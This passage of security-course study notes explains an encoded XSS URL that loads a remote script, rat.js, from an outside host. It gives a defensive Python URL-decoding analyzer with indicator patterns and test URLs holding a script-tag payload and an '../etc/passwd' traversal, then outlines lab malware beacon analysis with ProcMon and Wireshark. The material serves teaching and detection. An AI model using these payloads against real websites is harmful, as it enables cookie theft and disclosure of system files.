essentially the parameter value is a script tag that points to a JavaScript file at http://abc123.com/rat.js.
If the target website reflects or stores that value into a page without encoding it, the browser of whoever views that page loads and executes the script, which can perform potentially harmful actions (steal session cookies, make requests as the victim).
So by sending this URL, we are telling diontraining.com to hand upload.php
a post parameter containing this script tag, which links to an external JavaScript file.
If the website was vulnerable (reflected or stored XSS), that JavaScript ends up running in victims' browsers; the server itself does not execute the JavaScript, the browser does.
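An added example (not the lecture's code) that performs the decoding described above on the lecture's example URL: it splits the query on & and = before decoding so an encoded delimiter cannot create extra parameters, percent-decodes each value layer by layer to detect double encoding, flags percent sequences that encode unreserved characters, keeps the fragment separate because it never reaches the server, and matches the decoded values against a few indicator patterns. The URLs other than the lecture's example, and the indicator list, are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit

UNRESERVED = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")
MAX_LAYERS = 5

# Assumed indicator patterns, matched against the fully decoded value.
INDICATORS = {
    "script-tag": re.compile(r"<\s*script", re.I),
    "directory-traversal": re.compile(r"\.\./|\.\.\\"),
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
    "null-byte": re.compile("\x00"),
}

# The lecture's example, with a scheme added so urlsplit can parse the host.
EXAMPLE = ("https://diontraining.com/upload.php?post="
           "%3Cscript%20SRC%3D%22http%3A%2F%2Fabc123.com%2Frat.js%22%3E%3C%2Fscript%3E")

def decode_layers(value):
    """Percent-decode until nothing changes; returns every layer, so three or more
    entries means the input was double (or deeper) encoded."""
    layers = [value]
    while len(layers) <= MAX_LAYERS:
        decoded = unquote(layers[-1])
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers

def encoded_unreserved(value):
    """Percent sequences that encode characters which never needed it (%41 for 'A', %2E for '.').
    Browsers and libraries do not emit these, so they are an obfuscation signal."""
    hexes = re.findall(r"%([0-9A-Fa-f]{2})", value)
    return sorted({"%" + h for h in hexes if chr(int(h, 16)) in UNRESERVED})

def split_query(query):
    """Split on & and = BEFORE decoding, so an encoded delimiter inside a value (%26, %3D)
    stays in that value instead of creating a new pair. Values are returned still encoded."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, raw = part.partition("=")
            pairs.append((unquote(name), raw))
    return pairs

def _scan(report, raw):
    """Decode one raw component, updating depth, encoded-unreserved and indicator findings."""
    layers = decode_layers(raw)
    report["depth"] = max(report["depth"], len(layers) - 1)
    report["encoded_unreserved"] += encoded_unreserved(raw)
    for tag, pattern in INDICATORS.items():
        if pattern.search(layers[-1]):
            report["indicators"].add(tag)
    return layers[-1]

def analyze_url(url):
    """Decode path and query parameters layer by layer and collect indicators. The fragment
    (after #) is recorded separately: the browser never sends it to the server."""
    parts = urlsplit(url)
    report = {"host": parts.hostname, "path": "", "params": {}, "fragment": parts.fragment,
              "depth": 0, "encoded_unreserved": [], "indicators": set()}
    report["path"] = _scan(report, parts.path)
    for name, raw in split_query(parts.query):
        report["params"][name] = _scan(report, raw)
    if report["depth"] >= 2:
        report["indicators"].add("double-encoding")
    return report

if __name__ == "__main__":
    for url in (EXAMPLE,
                "https://diontraining.com/upload.php?post=%253Cscript%253Ealert(1)%253C%252Fscript%253E",
                "https://diontraining.com/%75pload.php?file=..%2F..%2Fetc%2Fpasswd#chapter2"):
        print(analyze_url(url))
```

The order of operations is the point: split first, decode second, match last. A filter that decodes the whole query string before splitting will happily let `%26` manufacture a parameter the developer never expected.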
[Conduct Packet Analysis]
basic packet analysis using Wireshark
To do this, I'm going to
launch a piece of malware on a lab system and watch how it beacons out over time.
use two pieces of software
ProcMon (Process Monitor) to look at the processes and make sure the malware is actually launching.
And then dig into the packet analysis using Wireshark so we can look at how those packets are going out and to what IPs, so we can develop indicators of compromise (the beacon destination, port, interval and any User-Agent or URI it uses)
trickster